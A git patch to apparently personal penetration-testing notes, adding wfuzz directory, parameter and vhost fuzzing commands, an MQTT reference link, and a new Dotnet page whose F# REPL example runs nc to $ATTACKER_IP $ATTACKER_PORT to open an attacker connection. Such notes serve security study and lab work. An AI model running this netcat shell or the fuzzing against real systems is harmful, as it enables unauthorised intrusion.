From 9cd859fa25ab0e7649c45ccdf649e4d21e2d7ea7 Mon Sep 17 00:00:00 2001 From: whx Date: Sun, 5 Mar 2023 17:16:35 +0100 Subject: [PATCH] bump --- Enumeration/Websites.md | 16 ++++++++++++- Exploits/IoT/Messaging_Protocols.md | 4 ++++ Miscellaneous/Dotnet.md | 23 +++++++++++++++++++ .../{ => Threat Intelligence}/ClamAV.md | 0 .../{ => Threat Intelligence}/Snort.md | 0 5 files changed, 42 insertions(+), 1 deletion(-) create mode 100644 Miscellaneous/Dotnet.md rename Miscellaneous/{ => Threat Intelligence}/ClamAV.md (100%) rename Miscellaneous/{ => Threat Intelligence}/Snort.md (100%) diff --git a/Enumeration/Websites.md b/Enumeration/Websites.md index 0d175ef..82c74ad 100644 --- a/Enumeration/Websites.md +++ b/Enumeration/Websites.md @@ -127,6 +127,20 @@ gobuster help dir ### Wfuzz +#### URLs with Wfuzz + +* GET requests fuzzing with wfuzz +```sh +wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u $ATTACKER_IP/FUZZ -t 100 --hh 0 +``` + +* POST requests fuzzing with wfuzz +```sh +wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u $ATTACKER_IP/FUZZ -t 100 --hh 0 -X POST +``` + +#### Parameters with Wfuzz + * Fuzz parameters ```sh wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/common.txt -X POST --hh 45 -u http:///api/items\?FUZZ\=test @@ -135,5 +149,5 @@ wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/common.txt -X POST -- #### DNS with Wfuzz ```sh - wfuzz -H "Host: FUZZ.example.com" --hc 302,400 -t 50 -H "User-Agent: DEDSEC" -c -z file,"/usr/share/seclists/Discovery/Web-Content/namelist.txt" http://example.com + wfuzz -H "Host: FUZZ.example.com" --hc 302,400 -t 50 -c -z file,"/usr/share/seclists/Discovery/Web-Content/namelist.txt" http://example.com ``` diff --git a/Exploits/IoT/Messaging_Protocols.md b/Exploits/IoT/Messaging_Protocols.md index 3050fcc..e8ca1b8 100644 --- a/Exploits/IoT/Messaging_Protocols.md +++ b/Exploits/IoT/Messaging_Protocols.md @@ -24,3 +24,7 @@ mosquitto_sub -h -t '#' ``` * `mosquitto_pub -h ` to publish to topics through mentioning the device ID. Can be send as raw, xml or json. `-f` for file sending * Base64 encoding + +## References + +* [Mosquitto usage](https://cedalo.com/blog/mqtt-subscribe-publish-mosquitto-pub-sub-example/) diff --git a/Miscellaneous/Dotnet.md b/Miscellaneous/Dotnet.md new file mode 100644 index 0000000..4d421da --- /dev/null +++ b/Miscellaneous/Dotnet.md @@ -0,0 +1,23 @@ +# Dotnet + +## Run Dotnet on Linux + +### Dotnet REPL + +* Dotnet can be executed just in time via dotnet commandline tool. An example on how to use this follows +```sh +dotnet fsi + +Microsoft (R) F# Interactive version 12.0.0.0 for F# 6.0 +Copyright (c) Microsoft Corporation. All Rights Reserved. + +For help type #help;; + +> open System.Diagnostics +- let psi = new ProcessStartInfo("nc", "$ATTACKER_IP $ATTACKER_PORT") +- psi.UseShellExecute <- false +- let _proc = Process.Start(psi) +- _proc.WaitForExit() |> ignore +- #quit;; +``` + diff --git a/Miscellaneous/ClamAV.md b/Miscellaneous/Threat Intelligence/ClamAV.md similarity index 100% rename from Miscellaneous/ClamAV.md rename to Miscellaneous/Threat Intelligence/ClamAV.md diff --git a/Miscellaneous/Snort.md b/Miscellaneous/Threat Intelligence/Snort.md similarity index 100% rename from Miscellaneous/Snort.md rename to Miscellaneous/Threat Intelligence/Snort.md